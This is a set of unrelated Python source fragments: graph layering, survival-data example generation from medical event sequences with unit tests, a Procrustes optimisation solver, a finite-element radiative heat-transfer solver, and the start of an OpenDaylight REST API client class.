# layers to be ordered top down.
for layerList in reversed(candidateLayering):
graph.append_layer(layerList)
def computeMinWidthLayering(self, upperBoundOnWidth, compensator, nodes):
""""
Computes a layering (as a List of Lists) for a given Iterable of {@link LNode} according to
the MinWidth-heuristic and considering actual node sizes.
:param upperBoundOnWidth: Defines a loose upper bound on the width of the MinWidth layerer.
Uses integer values as in the original approach described in the paper,
as this bound will automatically be multiplied internally with the average
normalized node size as part of the new approach considering the actual
sizes of nodes.
:param compensator: Multiplied with upperBoundOnWidth for defining an upper bound
on the width of layers which haven't been determined yet, but whose | |
in points:
state[event.type] = 1
# Yield example for point
yield build_example(
event_sequence, es_lo, now, now,
exposure_event_type, outcome_event_type,
state, feature_vector_function)
# Treat point events as ending now
for event in points:
state[event.type] = 0
# Treat starts as happening directly after now
for event in starts:
state[event.type] = 1
# Update `before`
before = now
if es_hi > before:
yield build_example(
event_sequence, es_lo, before, es_hi,
exposure_event_type, outcome_event_type,
state, feature_vector_function)
def examples_to_survival_examples(
examples, field_name2idx=field_name2idx):
out_idx = field_name2idx['out']
# Iterate over examples from transitions. Stop when there is an
# outcome.
prev_ex = None
for curr_ex in examples:
# If the current example has the outcome, transfer it to the
# previous example, so that an outcomes "ends" an example.
# Yield the example and stop generating examples.
if curr_ex[out_idx] == 1:
if prev_ex is None:
prev_ex = curr_ex
else:
prev_ex[out_idx] = 1
# Jump to yielding the last example
break
# Yield the previous example now that we know the current
# example doesn't have the outcome
if prev_ex is not None:
yield prev_ex
# Increment
prev_ex = curr_ex
# Yield the last example (if there were any examples at all)
if prev_ex is not None:
yield prev_ex
def event_sequence_to_survival_data_examples(
event_sequence,
exposure_event_type='exp',
outcome_event_type='out',
feature_vector_function=None,
field_name2idx=field_name2idx,
):
# Generate general examples from each transition
exs = examples_from_transitions(
event_sequence,
exposure_event_type, outcome_event_type,
feature_vector_function)
# Turn the general examples into survival examples
exs = examples_to_survival_examples(exs)
return exs
def print_survival_example(
example,
delimiter='|',
file=sys.stdout,
id_idx=field_name2idx['id'],
dates_idx=field_name2idx['dates'],
fv_idx=field_name2idx['fv'],
):
# Unpack / Flatten
ex = [
example[id_idx],
example[dates_idx].lo,
example[dates_idx].hi,
*example[(dates_idx + 1):fv_idx],
*(example[fv_idx] if example[fv_idx] else ()),
]
# Convert `None` to ''
for idx, field in enumerate(ex):
if field is None:
ex[idx] = ''
print(*ex, sep=delimiter, file=file)
def main_api( # TODO redo everything in terms of `cdmdata`
exposure_types_filename,
outcome_types_filename,
*, # Prevent any additional positional arguments, like from the
# command line
in_file=sys.stdin,
out_file=sys.stdout,
comment_char='#',
event_type_parser=parse_event_type,
exposure_event_type=('exp',),
outcome_event_type=('out',),
csv_format=event_data.csv_format,
include_tables=event_data.tables,
include_record=None,
record_transformer=None,
fact_constructor=event_data.fact_from_record,
event_constructor=event_data.event_from_record,
study_period_definer=None,
replace_mapped_events=False,
era_max_gap=datetime.timedelta(0),
feature_vector_header=(),
feature_vector_function=None,
output_delimiter='|',
field_name2idx=field_name2idx,
):
# Log start
logger = logging.getLogger(__name__)
logger.info('Starting `main_api` with arguments:\n{}',
pprint.pformat(locals()))
# Read exposure and outcome IDs
exposure_types = list(read_event_types(
exposure_types_filename, comment_char, event_type_parser))
outcome_types = list(read_event_types(
outcome_types_filename, comment_char, event_type_parser))
# Log exposures and outcomes
logger.info('Using {} exposures:\n{}', len(exposure_types),
'\n'.join(str(x) for x in exposure_types))
logger.info('Using {} outcomes:\n{}', len(outcome_types),
'\n'.join(str(x) for x in outcome_types))
# Map event types to encode exposures and outcomes
event_type2type = build_exposure_outcome_event_type_map(
exposure_types, outcome_types, exposure_event_type, outcome_event_type)
# Read records from input, process into events, assemble into
# sequences
logger.info('Reading event records and assembling into sequences')
seqs = events_to_sequences(
in_file,
event_type2type,
csv_format=csv_format,
comment_char=comment_char,
include_tables=include_tables,
include_record=include_record,
record_transformer=record_transformer,
fact_constructor=fact_constructor,
event_constructor=event_constructor,
study_period_definer=study_period_definer,
replace_mapped_events=replace_mapped_events,
era_max_gap=era_max_gap,
)
# Print data header
id_idx = field_name2idx['id']
dates_idx = field_name2idx['dates']
fv_idx = field_name2idx['fv']
print(fields[id_idx], 'date_lo', 'date_hi',
*fields[(dates_idx + 1):fv_idx],
*feature_vector_header,
sep=output_delimiter, file=out_file)
# Logger for tracking reading records
def tracker(count):
logger.info('Event sequences: {}', count)
# Generate survival examples from sequences
logger.info('Generating survival data examples from event sequences')
for ev_seq in general.track_iterator(
seqs,
tracker, track_every=1000,
track_init=True, track_end=True):
#ev_seq.pprint(file=sys.stderr)
exs = list(event_sequence_to_survival_data_examples(
ev_seq,
exposure_event_type, outcome_event_type,
feature_vector_function, field_name2idx))
if len(exs) == 0:
logger.info('Discarding event sequence {}: '
'No events in study period', ev_seq.id)
# Print examples
for ex in exs:
print_survival_example(
ex,
delimiter=output_delimiter,
file=out_file,
id_idx=id_idx,
dates_idx=dates_idx,
fv_idx=fv_idx,
)
logger.info('Done `main_api`')
# Tests
class SurvivalDataTest(unittest.TestCase):
def mk_ev(date1, date2, ev_type, value=None):
d1 = datetime.datetime.strptime(date1, '%Y-%m-%d').date()
d2 = datetime.datetime.strptime(date2, '%Y-%m-%d').date()
return esal.Event(esal.Interval(d1, d2), ev_type, value)
# Timeline with exposures with gaps of up to 90 days, outcomes, and
# other covariates
#
# exp1 exp2 era out a b
# 2012-06-17: +
# 2013-01-12: + + |
# 2013-02-11: - | |
# 2013-03-11: + | |
# 2013-04-14: | | -
# 2013-10-07: - -
# 2014-05-02: + +
# 2014-07-10: | | +
# 2015-02-26: - | |
# 2015-05-22: + | |
# 2015-06-13: | | + |
# 2015-09-19: - | | |
# 2015-12-12: + | | |
# 2016-03-11: - - | |
# 2016-05-18: - |
# 2016-08-23: + + |
# 2016-12-05: | | -
# 2016-12-21: | | +
# 2017-01-20: - | |
# 2017-03-29: + | |
# 2017-04-04: | + | |
# 2017-04-28: - | | |
# 2017-05-04: | | * |
# 2017-06-22: | | | +
# 2017-08-02: - - | |
# 2017-09-15: * | |
# 2017-10-27: - |
# 2017-12-08: + + |
# 2018-01-16: | | * |
# 2018-03-08: - | |
# 2018-04-21: | -
# 2018-05-27: + |
# 2018-07-20: | | +
# 2018-10-24: - - |
# 2018-11-11: * |
# 2018-12-28: -
evs = (
# Exposure 1
mk_ev('2013-01-12', '2013-02-11', 'e1'),
mk_ev('2013-03-11', '2013-10-07', 'e1'),
mk_ev('2014-05-02', '2015-02-26', 'e1'),
mk_ev('2015-05-22', '2015-09-19', 'e1'),
mk_ev('2015-12-12', '2016-03-11', 'e1'),
mk_ev('2016-08-23', '2017-01-20', 'e1'),
mk_ev('2017-03-29', '2017-04-28', 'e1'),
# Exposure 2
mk_ev('2017-04-04', '2017-08-02', 'e2'),
mk_ev('2017-12-08', '2018-03-08', 'e2'),
mk_ev('2018-05-27', '2018-10-24', 'e2'),
# Exposure eras
mk_ev('2013-01-12', '2013-10-07', 'era'),
mk_ev('2014-05-02', '2016-03-11', 'era'),
mk_ev('2016-08-23', '2017-08-02', 'era'),
mk_ev('2017-12-08', '2018-10-24', 'era'),
# Outcome
mk_ev('2017-05-04', '2017-05-04', 'o'),
mk_ev('2017-09-15', '2017-09-15', 'o'),
mk_ev('2018-01-16', '2018-01-16', 'o'),
mk_ev('2018-11-11', '2018-11-11', 'o'),
# Covariates
mk_ev('2012-06-17', '2013-04-14', 'a'),
mk_ev('2015-06-13', '2016-05-18', 'a'),
mk_ev('2016-12-21', '2017-10-27', 'a'),
mk_ev('2018-07-20', '2018-12-28', 'a'),
mk_ev('2014-07-10', '2016-12-05', 'b'),
mk_ev('2017-06-22', '2018-04-21', 'b'),
)
# Examples from the above events
examples = [
# id, itvl, lo, hi, len, exp?, out?, fv
[0, esal.Interval(datetime.date(2012, 6, 17),
datetime.date(2013, 1, 12)),
0, 209, 209, 0, 0, None],
[0, esal.Interval(datetime.date(2013, 1, 12),
datetime.date(2013, 10, 7)),
209, 477, 268, 1, 0, None],
[0, esal.Interval(datetime.date(2013, 10, 7),
datetime.date(2014, 5, 2)),
477, 684, 207, 0, 0, None],
[0, esal.Interval(datetime.date(2014, 5, 2),
datetime.date(2016, 3, 11)),
684, 1363, 679, 1, 0, None],
[0, esal.Interval(datetime.date(2016, 3, 11),
datetime.date(2016, 8, 23)),
1363, 1528, 165, 0, 0, None],
[0, esal.Interval(datetime.date(2016, 8, 23),
datetime.date(2017, 5, 4)),
1528, 1782, 254, 1, 0, None],
# First outcome
[0, esal.Interval(datetime.date(2017, 5, 4)),
1782, 1782, 0, 1, 1, None],
[0, esal.Interval(datetime.date(2017, 5, 4),
datetime.date(2017, 8, 2)),
1782, 1872, 90, 1, 0, None],
[0, esal.Interval(datetime.date(2017, 8, 2),
datetime.date(2017, 9, 15)),
1872, 1916, 44, 0, 0, None],
[0, esal.Interval(datetime.date(2017, 9, 15)),
1916, 1916, 0, 0, 1, None],
[0, esal.Interval(datetime.date(2017, 9, 15),
datetime.date(2017, 12, 8)),
1916, 2000, 84, 0, 0, None],
[0, esal.Interval(datetime.date(2017, 12, 8),
datetime.date(2018, 1, 16)),
2000, 2039, 39, 1, 0, None],
[0, esal.Interval(datetime.date(2018, 1, 16)),
2039, 2039, 0, 1, 1, None],
[0, esal.Interval(datetime.date(2018, 1, 16),
datetime.date(2018, 10, 24)),
2039, 2320, 281, 1, 0, None],
[0, esal.Interval(datetime.date(2018, 10, 24),
datetime.date(2018, 11, 11)),
2320, 2338, 18, 0, 0, None],
[0, esal.Interval(datetime.date(2018, 11, 11)),
2338, 2338, 0, 0, 1, None],
[0, esal.Interval(datetime.date(2018, 11, 11),
datetime.date(2018, 12, 28)),
2338, 2385, 47, 0, 0, None],
]
def test_set_drug_interval(self):
record = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 2, 1),
'rx', 1234, None, {'days':30, 'qty': 45, 'refills':4}]
expected = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 7, 1),
'rx', 1234, None, {'days':30, 'qty': 45, 'refills':4}]
actual = set_drug_interval(record, washout=32)
self.assertEqual(expected, actual)
def test_set_drug_interval__no_json(self):
record = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 1, 11),
'rx', 1234, None, None]
expected = [
1, datetime.date(2000, 1, 1), datetime.date(2000, 2, 14),
'rx', 1234, None, None]
actual = set_drug_interval(record, washout=14)
self.assertEqual(expected, actual)
def test_limit_to_ages(self):
mk_ev = SurvivalDataTest.mk_ev
dob = datetime.date(2000, 1, 1)
lo = datetime.date(2015, 10, 25)
hi = datetime.date(2017, 2, 11)
expected = [
mk_ev('2015-10-25', '2015-10-25', ('study', 'lo'), ()),
mk_ev('2015-10-25', '2016-03-11', 'era'),
mk_ev('2015-10-25', '2016-05-18', 'a'),
mk_ev('2015-10-25', '2016-12-05', 'b'),
mk_ev('2015-12-12', '2016-03-11', 'e1'),
mk_ev('2016-08-23', '2017-01-20', 'e1'),
mk_ev('2016-08-23', '2017-02-11', 'era'),
mk_ev('2016-12-21', '2017-02-11', 'a'),
mk_ev('2017-02-11', '2017-02-11', ('study', 'hi'), ()),
]
ev_seq = esal.EventSequence(self.evs)
ev_seq['bx', 'dob'] = ('2000-01-01', None) # Include spot for JSON
actual = limit_to_ages(
ev_seq,
(lo - dob).days / 365,
(hi - dob).days / 365,
)
self.maxDiff = None
self.assertEqual(ev_seq.id, actual.id)
self.assertEqual(ev_seq.facts(), actual.facts())
self.assertEqual(expected, list(actual.events()))
def test_feature_vector_function(self):
fvf = mk_feature_vector_function(
age_at_first_event,
mk_fact_feature(('bx', 'gndr')),
mk_fact_feature(('bx', 'race')),
mk_has_event_feature('e'),
mk_has_event_feature('o'),
mk_event_count_feature('a'),
mk_event_count_feature('b'),
mk_event_count_feature('c'),
)
ev_seq = esal.EventSequence(self.evs)
ev_seq['bx', 'dob'] = ('2000-01-01', None) # Include spot for JSON
ev_seq['bx', 'gndr'] = ('F', None)
expected = [12.5, 'F', None, 0, 1, 4, 2, 0]
actual = fvf(ev_seq)
# Make | |
``bool``
Whether or not the optimizer exited successfully.
- ``status`` : ``int``
Termination status of the optimizer. Its value depends on the
underlying solver. Refer to `message` for details.
- ``message`` : ``str``
Description of the cause of the termination.
- ``solution`` : ``ndarray``
Matrix representing the solution found by the method.
- ``fun`` : ``float``
Value of the objective function at the solution.
- ``normcrit`` : ``float``
Value of the norm of the criticality measure (e.g. gradient) at
the solution.
- ``nbiter`` : ``int``
Number of iterations performed by the optimizer.
- ``nfev`` : ``int``/``float``
Number of evaluations of the objective function (if called by
GKBSolver, nfev is a float representing the proportional number
of calls to the objective function at each block step).
- ``total_fun``: list
List of objective function values for each iteration performed
(used to report and compare algorithms). Only if ``full_results``
is True.
- ``total_crit``: list
List of criticality measure values for each iteration performed
(used to report and compare algorithms). Only if ``full_results``
is True.
- ``cpu``: ``float``
CPU time required for convergence.
- ``error``: ``float``
Frobenius norm of the difference between exact and approximate
solutions.
- ``blocksteps`` : ``int``
Number of blocksteps performed (if called by GKBSolver)
Notes:
There may be additional attributes not listed above depending of the
specific solver. Since this class is essentially a subclass of dict
with attribute accessors, one can see which attributes are available
using the `keys()` method.
"""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __repr__(self):
if self.keys():
m = max(map(len, list(self.keys()))) + 1
return '\n'.join([k.rjust(m) + ': ' + repr(v)
for k, v in sorted(self.items())])
else:
return self.__class__.__name__ + "()"
def __dir__(self):
return list(self.keys())
def show(self):
print("=========")
print(" Summary:")
print("=========")
for k, v in self.items():
if k != "solution" and v != np.inf:
print(k, ": {}".format(v))
class ProcrustesSolver:
"""
Abstract class to implement a solver for the ProcrustesProblem.
All subclasses should implement the following methods:
"""
def __init__(self, *args, **kwargs):
self.solver = None
def _setoptions(self, *args, **kwargs):
"""
Choose which options are valid and applicable to this solver.
"""
pass
def solve(self, *args, **kwargs):
"""
Call a solver function and set up the ``OptimizeResult`` instance with
the result and statistics as convenient for this solver. Should be
something like this:
::
output = somesolver(problem, *args, **kwargs)
result = OptimizeResult(output)
return result
"""
# output = self.solver(*args, **kwargs)
output = dict([])
result = OptimizeResult(output)
return result
class SPGSolver(ProcrustesSolver):
"""
Subclass containing the call to the ``spg_solver()`` function
corresponding to the Spectral Projected Gradient solver described in
:cite:`FranBaza12` and :cite:`FranBazaWebe17`.
Usage example:
>>> mysolver = skp.SPGSolver(verbose=2)
>>> result = mysolver.solve(problem)
Input:
``key = value``: keyword arguments available
- ``full_results``: (*default*: ``False``)
Return list of criticality values at each iteration (for later
comparison between solvers)
- ``filename``: (*default*: sys.stdout)
Decides if we are going to output print statements to stdout
or to a file called ``filename``
- ``strategy``: (*default*: ``"newfw"``)
- ``"monotone"``:
monotone trust region
- ``"bazfr"`` :
nonmonotone method according to :cite:`FranBaza12`
- ``"newfw"`` :
nonmonotone method according to :cite:`FranBazaWebe17`
- ``gtol``: (*default*: ``1e-3``)
tolerance for detecting convergence on the gradient
- ``eta``: (*default*: ``0.85``)
parameter for the nonmonotone cost computation
- ``etavar``: (*default*: ``False``)
decide if we are going to vary the parameter eta
for the nonmonotone cost computation
- ``maxiter``: (*default*: ``5000``)
maximum number of iterations allowed
- ``verbose``: (*default*: ``1``)
verbosity level. Current options:
- ``0``: only convergence info
- ``1``: only show time and final stats
- ``2``: show outer iterations
- ``3``: everything (except debug which is set separately)
- ``changevar``: (*default*: ``False``)
boolean option to allow for a change of variables before starting the
method. Currently disabled due to bad performance.
- ``polar``: (*default*: ``None``)
option to decide if we are going to compute the solution of the
SPG subproblem via an SVD decomposition or via iterative methods
to compute the polar decomposition.
Can take values ``ns`` or ``None``.
- ``timer``: (*default*: ``False``)
decide if we are going to time this run.
- ``precond``: (*default*: ``None``)
option to decide if we are going to use preconditioners or not.
Can take values ``stupid`` or ``None``.
Output:
``solver``: ``ProcrustesSolver`` instance
"""
def __init__(self, **kwargs):
super().__init__()
self._setoptions(options=kwargs)
self.solvername = "spg"
def _setoptions(self, options):
"""
Sets and validates options for the SPGSolver.
*This method should not be called directly; it is called by the
SPGSolver constructor.*
"""
# Options for the solver.
# The user should not call this method explicitly, but pass the desired
# options as arguments when instantiating a SPGSolver object. If no
# options are selected by the user, default options are used.
# Keys available:
#
# - full_results: return list of criticality values at each iteration
#
# - filename: Decides if we are going to output print statements to
# stdout or to a file called filename
#
# - strategy:
# > "monotone": monotone trust region
# > "bazfr" : nonmonotone method according to [1]
# > "newfw" : nonmonotone method according to [2]
#
# - gtol: tolerance for detecting convergence on the gradient
#
# - eta: parameter for the nonmonotone cost computation
#
# - etavar: decide if we are going to vary the parameter eta
# for the nonmonotone cost computation
#
# - maxiter: maximum number of iterations allowed
#
# - verbose: verbosity level
# 0: only convergence info
# 1: only show time and final stats
# 2: show outer iterations
# 3: everything (except debug which is set separately)
# - changevar: boolean option to allow for a change of variables
# before starting the method. Currently disabled
# due to bad performance
# - polar: option to decide if we are going to compute the solution of
# the GKB subproblem via an SVD decomposition or via iterative
# methods to compute the polar decomposition.
# Can take values ``ns`` or ``None``.
# - timer: decide if we are going to time this run.
#
# - precond: option to decide if we are going to use
# preconditioners or not. Can take values ``stupid``
# or ``None``.
super()._setoptions()
self.options = options
keys = self.options.keys()
if "full_results" not in keys:
self.options["full_results"] = False
elif type(self.options["full_results"]) != bool:
raise Exception("full_results must be a boolean")
if "filename" not in keys:
self.options["filename"] = None
elif type(self.options["filename"]) != str:
raise Exception("filename must be a string")
elif os.path.exists(self.options["filename"]):
raise Exception("\"{}\" already exists."
.format(self.options["filename"]))
if "strategy" not in keys:
self.options["strategy"] = "newfw"
elif self.options["strategy"] not in ("monotone", "bazfr", "newfw"):
raise Exception("strategy not implemented")
if "gtol" not in keys:
self.options["gtol"] = 1e-3
elif type(self.options["gtol"]) != float:
raise Exception("gtol must be a float")
if "eta" not in keys:
self.options["eta"] = 0.85
elif type(self.options["eta"]) != float:
raise Exception("eta must be a float")
if "etavar" not in keys:
self.options["etavar"] = False
elif type(self.options["etavar"]) != bool:
raise Exception("etavar must be a boolean")
if "maxiter" not in keys:
self.options["maxiter"] = 5000
elif type(self.options["maxiter"]) != int:
raise Exception("maxiter must be an integer")
if "verbose" not in keys:
self.options["verbose"] = 1
elif self.options["verbose"] not in (0, 1, 2, 3):
raise Exception("verbose must be 0, 1, 2 or 3")
if "changevar" not in keys:
self.options["changevar"] = False
elif type(self.options["changevar"]) != bool:
raise Exception("changevar must be True or False")
if "polar" not in keys:
self.options["polar"] = None
elif self.options["polar"] not in (None, "ns"):
raise Exception("polar must be ns or None")
if "timer" not in keys:
self.options["timer"] = False
elif type(self.options["timer"]) != bool:
raise Exception("timer must be boolean")
if "precond" not in keys:
self.options["precond"] = None
elif self.options["precond"] not in (None, "stupid"):
raise Exception("precond must be stupid or None")
def solve(self, problem):
"""
Effectively solve the problem using the SPG method.
Input:
``problem``: ``ProcrustesProblem`` instance
| |
<gh_stars>0
# -*- coding: utf-8 -*-
"""
@author: <NAME>
@copyright Copyright 2016, <NAME>
@lisence: MIT
@status: alpha
"""
import numpy as np
import NodeMapping
import ElemTools as et
import scipy.constants as sconst
from scipy.sparse.linalg import spsolve as scipy_sparse_linsolve
from scipy.sparse.linalg import eigsh as scipy_sparse_eigens
import time as python_time
import Accelerated as Accl
import csv
class ht3_solver:
def __init__(self, mesh):
# USER FIELDS:
# simulation setup
# mesh
self.mesh = mesh
self.export_mesh = None # For XFEM we use this mesh for data export.
self.export_mesh_geomfix_nearest = None
self.save_path = None
# time
self.max_T = None
self.d_T = None
# simulation setup optical
self.v0_frequency = None
self.fq_list = []
# simulation setup temperatures
self.background_temperature = None
self.initial_temperature = None
self.diff_scale = None
# material properties
# optical
self.absorb_coeffs = [] # Absorbtion coefficients.
self.alpha = None # (Hemisperic emssivity)
self.refr_idx_vol = None
self.refr_idx_background = None
self.r1 = None
self.r2 = None
# conductive
self.density = None
self.heat_capacity = None
self.thermal_conductivity = None
self.convect_coeff = None
# SOLVER INTERNALS
self.step = None
self.current_T = None
# cond would be true if currently solving for conduction
self.cond = False
# Last set of temperature coefficients
self.lst_tmp = None
# rad is none whilst not solving for radiation
# takes value of index of frequency in fq list when solving for freq.
self.rad = None
# List of the last set(s) or radiative intensity coefficients
self.lst_rad = []
# Data retention
self.saved_data = {}
self.node_map = NodeMapping.NodeIdxMap()
# Mesh to export point / element mapping
self.export_to_elem = None
self.norm_path = None
self.expected_solution = None
self.redefined = False
def save_rule(step, dt): return True
self.save_rule = save_rule
def norm_saving_rule(step, dt): return True
self.norm_saving_rule = norm_saving_rule
def advance(self, sol):
""" Prepare for next simulation step
Saves last solution in correct place. Changes constants and functions
to be approriate for next step. Returns false if the simulation should
end, true otherwise.
"""
self.data_saving(sol)
simulation_continues = self._advance_settings(sol)
self.redef_vars()
self.reporting(sol)
self.norm_reporting()
return simulation_continues
def _advance_settings(self, sol):
""" Changes settings that indicate what the solver should be solving #
for next. Save sol correctly.
sol is the solution vector of the last step.
sol = anything can be used on first step.
"""
if self.cond == True:
# Save last solution...
self.lst_tmp = sol
# Check if all timesteps are complete.
self.current_T += self.d_T
self.step += 1
if self.current_T > self.max_T:
return False
# Set to not be conduction any more
self.cond = False
if len(self.fq_list) > 0:
self.rad = 0
else:
# There are radiation steps to do.
self.cond = True
return True
# If we're here, we're either not done anything yet or have
# just done a radiation step.
if self.rad != None:
# Save last solution
self.lst_rad[self.rad] = sol
# Advance to next radiation stage if one exists. Else cond.
if self.rad + 1 != len(self.fq_list):
self.rad += 1
else:
self.rad = None
self.cond = True
return True
# If we've made it to here, we must just setting the simulation
# going.
assert (len(self.fq_list) == len(self.lst_rad))
if len(self.lst_rad) > 0:
assert (len(self.fq_list) == len(self.absorb_coeffs))
assert (self.refr_idx_vol >= 0.0)
# Could set to zero, but that might limit restarts. Just check
# Validity....
assert (self.step != None)
assert (self.d_T > 0.0)
assert (self.current_T != None)
assert (self.max_T != None)
assert (self.max_T > self.current_T)
assert (self.diff_scale >= 0.0)
assert (self.diff_scale <= 1.0)
assert (self.thermal_conductivity > 0.0)
assert (self.alpha >= 0.0)
assert (self.refr_idx_background >= 0.0)
# Set the ball rolling:
if len(self.fq_list) > 0:
# We can set solver for frequencies first...
self.rad = 0
else:
self.cond = True
return True
def redef_vars(self):
""" Redefines constants and vectors used to be appropriate for time
and solver step.
"""
# Try using redefined source / boundary terms
if self.redefined == True:
self._redef_via_predef_eqn()
else: # If they haven't been set you'll get an exception.
self._redef_sp1_vars()
def _redef_via_predef_eqn(self):
""" If the solver has been given predefined boundary conditions
and source terms, redefine the variables used in the simulation as
these instead """
time = self.current_T # + self.d_T
self.Beta = (self.diff_scale * self.thermal_conductivity) / \
(self.convect_coeff)
self.Epsilon = self.d_T * self.thermal_conductivity / \
(self.density * self.heat_capacity)
# Source term.
def F_func(elem, eta):
x = elem.local_to_global(eta)
F = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
F -= self.Epsilon * self.redef_F_laplacian(x[0], x[1], time)
F += self.redef_dTdt(x[0], x[1], time) * self.d_T
return elem.funcs(eta) * F
self.vF_vect_vol = et.elems_2_array(self.mesh,
F_func,
self.node_map,
gauss_mult=2) # Use double gp_1D
# Boundary term.
def f_func(elem, eta):
n = elem.guess_normal_vector_global(eta)
f = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
x = elem.local_to_global(eta)
# Evaluate our boundary term.
f += self.Beta * self.redef_f_norm_grad(x[0], x[1], time, n)
f += self.redef_dTdt(x[0], x[1], time) * self.d_T
return elem.funcs(eta) * f
self.vf_vect_bound = et.edge_2_array(self.mesh,
"Boundary",
f_func,
self.node_map,
gauss_mult=2)
def _redef_sp1_vars(self):
""" Redefines constants and vectors to be appropriate for time and
solver step in an SP1 approximation of RHT / heat transfer."""
if len(self.fq_list) == 0:
no_rad = True
lst_tmp = np.matrix(np.reshape(self.lst_tmp,
(self.lst_tmp.size, 1)))
else: no_rad = False
# The practically constants...
# Big Epsilon:
if self.cond == True:
self.Epsilon = self.d_T * self.thermal_conductivity
else:
self.Epsilon = (self.diff_scale ** 2) / \
(3.0 * self.absorb_coeffs[self.rad] ** 2)
# Beta:
if self.cond == True:
self.Beta = (self.diff_scale * self.thermal_conductivity) / \
(self.convect_coeff)
else:
self.Beta = (1.0 + 3.0 * self.r2) * (2.0 * self.diff_scale) / \
((1.0 - 2.0 * self.r1) * (
3.0 * self.absorb_coeffs[self.rad]))
# The feild solutions at the last timestep.
# The integral vF:
if self.cond == True:
# The horrifically complicated F:
def F_func_cond(elem, eta):
F = 0.0
Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
F += Tn
for k in range(0, len(self.fq_list)):
vk = self.fq_list[k]
try:
vk_m = self.fq_list[k - 1]
except:
vk_m = self.v0_frequency
absorbtion = self.absorb_coeffs[k]
phi = elem.eval_elem(self.node_map, self.lst_rad[k],
[eta])[0]
inter1 = phi - 4.0 * sconst.pi * \
self.B_int_function(Tn, self.refr_idx_vol,
vk, vk_m)
inter2 = absorbtion * self.d_T / (self.diff_scale ** 2)
F += inter2 * inter1
return elem.funcs(eta) * F
if not no_rad:
# We're integrating something non-linear for SP1
self.vF_vect_vol = et.elems_2_array(self.mesh,
F_func_cond,
self.node_map)
else:
# Or something easier if we're only looking at heat.
self.vF_vect_vol = np.array(self.uv_vol * lst_tmp).reshape(-1)
else:
def F_func_radiative(elem, eta):
T = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
vk = self.fq_list[self.rad]
try:
vk_minus = self.fq_list[self.rad - 1]
except:
vk_minus = self.v0_frequency
n = self.refr_idx_vol
F = 4.0 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)
return elem.funcs(eta) * F
self.vF_vect_vol = et.elems_2_array(self.mesh,
F_func_radiative,
self.node_map)
# The path integral vf:
if self.cond == True:
def f_func_cond(elem, eta):
Tb = self.background_temperature
Tn = elem.eval_elem(self.node_map, self.lst_tmp, [eta])[0]
n = self.refr_idx_background
vk = self.v0_frequency
vk_minus = 0
Bb0 = self.B_int_function(Tb, n, vk, vk_minus)
Bn0 = self.B_int_function(Tn, n, vk, vk_minus)
B_coeff = (self.alpha * sconst.pi) / self.convect_coeff
f = Tb + B_coeff * (Bb0 - Bn0)
return elem.funcs(eta) * f
if not no_rad:
self.vf_vect_bound = et.edge_2_array(self.mesh,
"Boundary",
f_func_cond,
self.node_map)
else:
try:
self.vf_vect_bound = self.cache_tb_integral_array
except AttributeError:
def elem_functor(elem, eta): return elem.funcs(eta)
self.cache_tb_integral_array = et.edge_2_array(self.mesh,
"Boundary",
elem_functor,
self.node_map)
self.cache_tb_integral_array *= self.background_temperature
self.vf_vect_bound = self.cache_tb_integral_array
else:
# Radiation f = 4*pi*B^{(k)}(T_b, n_g)
def f_func_radiative(elem, eta):
T = self.background_temperature
vk = self.fq_list[self.rad]
try:
vk_minus = self.fq_list[self.rad - 1]
except:
vk_minus = self.v0_frequency
n = self.refr_idx_vol
f = 4 * sconst.pi * self.B_int_function(T, n, vk, vk_minus)
return elem.funcs(eta) * f
self.vf_vect_bound = et.edge_2_array(self.mesh,
"Boundary",
f_func_radiative,
self.node_map)
assert (self.vF_vect_vol.size == self.vF_vect_vol.shape[0])
assert (self.vf_vect_bound.size == self.vf_vect_bound.shape[0])
assert (self.vf_vect_bound.shape[0] == \
self.vF_vect_vol.shape[0])
def initialise(self, initial=None):
""" Prepare for the start of simulation.
Build nodemapping object.
Prepare T0, defaults as initial temperatures or
initial(x, y) if provided as argument.
Setup constant matrices.
"""
ticy = python_time.clock()
if hasattr(self, 'redef_F_laplacian') or \
hasattr(self, 'redef_f_norm_grad'):
print("ht3_solver:\tVariables resassigned to known solution.")
assert (hasattr(self, 'redef_F_laplacian'))
assert (hasattr(self, 'redef_f_norm_grad'))
self.redefined = True
self._print_setup()
# Add all elem DoFs to NodeMapping
for elem in self.mesh.elems.values():
self.node_map.tags_to_idxs(elem.elem_node_tag_gen())
# Set initial condition.
t0 = np.zeros(self.node_map.count, dtype=np.float64)
if initial is None:
for elem in self.mesh.elems.values():
idxs = self.node_map.tags_to_idxs(elem.elem_node_tag_gen())
t0[idxs[:elem.dnen()]] = | |
<reponame>eriksore/sdn
"""
OpenDaylight REST API
Copyright 2013 The University of Wisconsin Board of Regents
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Written by: <NAME>, <EMAIL>
Network Services Group
Division of Information Technology
University of Wisconsin at Madison
This material is based upon work supported by the National Science Foundation
under Grant No. 1247322.
"""
from __future__ import print_function
import json
import requests
from requests.auth import HTTPBasicAuth
class OpenDaylight(object):
"""An object holding details to talk to the OpenDaylight REST API
OpenDaylight.setup is a dictionary loaded with the following
default values:
{'hostname':'localhost',
'port':'8080',
'username':'admin',
'password':'<PASSWORD>',
'path':'/controller/nb/v2/',
'container':'default',
'http':'http://' }
Your code should change these as required for your installation.
OpenDaylight.url holds the url for each REST query. Typically
you would let OpenDaylight.prepare() build this for you.
OpenDaylight.auth holds an auth object for Requests to use
for each REST query. Typically you would also let
OpenDaylight.prepare() build this for you.
"""
def __init__(self):
"""Set some mostly reasonable defaults.
"""
self.setup = {'hostname':'192.168.231.246',
'port':'8080',
'username':'admin',
'password':'<PASSWORD>',
'path':'/controller/nb/v2/',
'container':'default',
'http':'http://'}
self._base_url = None
self.url = None
self.auth = None
